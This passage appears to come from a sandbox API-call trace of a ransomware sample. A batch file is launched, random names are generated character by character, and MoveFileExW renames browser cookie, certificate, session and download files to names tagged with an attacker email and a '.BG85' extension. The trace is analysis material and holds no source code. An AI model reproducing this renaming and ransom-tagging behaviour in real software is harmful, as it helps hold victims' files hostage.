dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36df864 | out: lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\"", lpProcessInformation=0x36df864*(hProcess=0x208, hThread=0x1e8, dwProcessId=0x570, dwThreadId=0xa34)) returned 1 [0258.360] WaitForSingleObject (hHandle=0x208, dwMilliseconds=0x1388) Thread: id = 24 os_tid = 0x9ac [0062.867] GetTickCount () returned 0x1149280 [0062.867] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18320602782) returned 1 [0062.867] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="i") returned 1 [0062.867] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="K") returned 1 [0062.867] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="b") returned 1 [0062.867] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="O") returned 1 [0062.867] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="n") returned 1 [0062.867] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="2") returned 1 [0062.868] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="b") returned 1 [0062.868] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="3") returned 1 [0062.868] GetTickCount () returned 0x1149280 [0062.868] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=18320660716) returned 1 [0062.868] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="y") returned 1 [0062.868] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="S") returned 1 [0062.868] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="9") returned 1 [0062.868] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="A") returned 1 [0062.868] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="O") returned 1 [0062.868] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="O") returned 1 [0062.868] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="j") returned 1 [0062.868] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="O") returned 1 [0062.868] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\[BobGreen85@criptext.com].iKbOn2b3-yS9AOOjO.BG85" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\[bobgreen85@criptext.com].ikbon2b3-ys9aoojo.bg85"), dwFlags=0x1) returned 1 [0064.158] GetTickCount () returned 0x1149444 [0064.158] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18449702512) returned 1 [0064.158] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="L") returned 1 [0064.158] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="o") returned 1 [0064.158] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="l") returned 1 [0064.158] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="3") returned 1 [0064.158] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="d") returned 1 [0064.158] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="k") returned 1 [0064.158] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="O") returned 1 [0064.158] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="z") returned 1 [0064.158] GetTickCount () returned 0x1149444 [0064.159] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=18449746281) returned 1 [0064.159] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="j") returned 1 [0064.159] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="e") returned 1 [0064.159] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="3") returned 1 [0064.159] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="O") returned 1 [0064.159] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="5") returned 1 [0064.159] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="6") returned 1 [0064.159] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="U") returned 1 [0064.159] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="4") returned 1 [0064.159] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\[BobGreen85@criptext.com].Lol3dkOz-je3O56U4.BG85" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\[bobgreen85@criptext.com].lol3dkoz-je3o56u4.bg85"), dwFlags=0x1) returned 1 [0064.160] GetTickCount () returned 0x1149444 [0064.160] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18449887849) returned 1 [0064.160] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="0") returned 1 [0064.160] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="c") returned 1 [0064.160] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="n") returned 1 [0064.160] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="0") returned 1 [0064.160] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="k") returned 1 [0064.160] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="u") returned 1 [0064.160] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="R") returned 1 [0064.160] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0064.160] GetTickCount () returned 0x1149444 [0064.160] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=18449929603) returned 1 [0064.160] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="2") returned 1 [0064.160] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="J") returned 1 [0064.161] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="R") returned 1 [0064.161] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="u") returned 1 [0064.161] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="t") returned 1 [0064.161] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="m") returned 1 [0064.161] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="W") returned 1 [0064.161] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="m") returned 1 [0064.161] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.bak"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\[BobGreen85@criptext.com].0cn0kuRC-2JRutmWm.BG85" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\[bobgreen85@criptext.com].0cn0kurc-2jrutmwm.bg85"), dwFlags=0x1) returned 1 [0064.162] GetTickCount () returned 0x1149454 [0064.162] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18450063009) returned 1 [0064.162] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="q") returned 1 [0064.162] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="U") returned 1 [0064.162] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="n") returned 1 [0064.162] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="x") returned 1 [0064.162] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="T") returned 1 [0064.162] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="d") returned 1 [0064.162] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0064.162] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="D") returned 1 [0064.162] GetTickCount () returned 0x1149454 [0064.162] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=18450112540) returned 1 [0064.162] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="l") returned 1 [0064.162] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0064.162] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="o") returned 1 [0064.162] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="7") returned 1 [0064.162] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="5") returned 1 [0064.162] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="h") returned 1 [0064.162] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="b") returned 1 [0064.163] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="n") returned 1 [0064.163] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\CodeFile.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\codefile.zip"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\[BobGreen85@criptext.com].qUnxTd8D-lCo75hbn.BG85" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\[bobgreen85@criptext.com].qunxtd8d-lco75hbn.bg85"), dwFlags=0x1) returned 1 [0064.163] GetTickCount () returned 0x1149454 [0064.163] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18450239463) returned 1 [0064.164] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="h") returned 1 [0064.164] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="b") returned 1 [0064.164] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="l") returned 1 [0064.164] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="h") returned 1 [0064.164] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="L") returned 1 [0064.164] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="B") returned 1 [0064.164] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="i") returned 1 [0064.164] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="9") returned 1 [0064.164] GetTickCount () returned 0x1149454 [0064.164] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=18450288667) returned 1 [0064.164] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="W") returned 1 [0064.164] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="R") returned 1 [0064.164] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="h") returned 1 [0064.164] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="b") returned 1 [0064.164] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="1") returned 1 [0064.164] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="e") returned 1 [0064.164] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="u") returned 1 [0064.164] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="h") returned 1 [0064.164] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cert8.db"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\[BobGreen85@criptext.com].hblhLBi9-WRhb1euh.BG85" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\[bobgreen85@criptext.com].hblhlbi9-wrhb1euh.bg85"), dwFlags=0x1) returned 1 [0064.165] GetTickCount () returned 0x1149454 [0064.165] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18450391929) returned 1 [0064.165] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="j") returned 1 [0064.165] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="s") returned 1 [0064.165] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="7") returned 1 [0064.165] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="X") returned 1 [0064.165] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="f") returned 1 [0064.165] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="E") returned 1 [0064.165] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="x") returned 1 [0064.165] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="X") returned 1 [0064.165] GetTickCount () returned 0x1149454 [0064.165] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe34 | out: lpPerformanceCount=0x381fe34*=18450440365) returned 1 [0064.166] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="e") returned 1 [0064.166] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="E") returned 1 [0064.166] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="M") returned 1 [0064.166] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="i") returned 1 [0064.166] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="K") returned 1 [0064.166] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="U") returned 1 [0064.166] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="l") returned 1 [0064.166] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe10, cbMultiByte=1, lpWideCharStr=0x381edf8, cchWideChar=2047 | out: lpWideCharStr="T") returned 1 [0064.166] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\downloads.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\[BobGreen85@criptext.com].js7XfExX-eEMiKUlT.BG85" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\[bobgreen85@criptext.com].js7xfexx-eemikult.bg85"), dwFlags=0x1) returned 1 [0064.167] GetTickCount () returned 0x1149454 [0064.167] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=18450566084) returned 1 [0064.167] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="Y") returned 1 [0064.167] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0064.167] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, lpWideCharStr=0x381ee00, cchWideChar=2047 | out: lpWideCharStr="d") returned 1 [0064.167] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x381fe18, cbMultiByte=1, 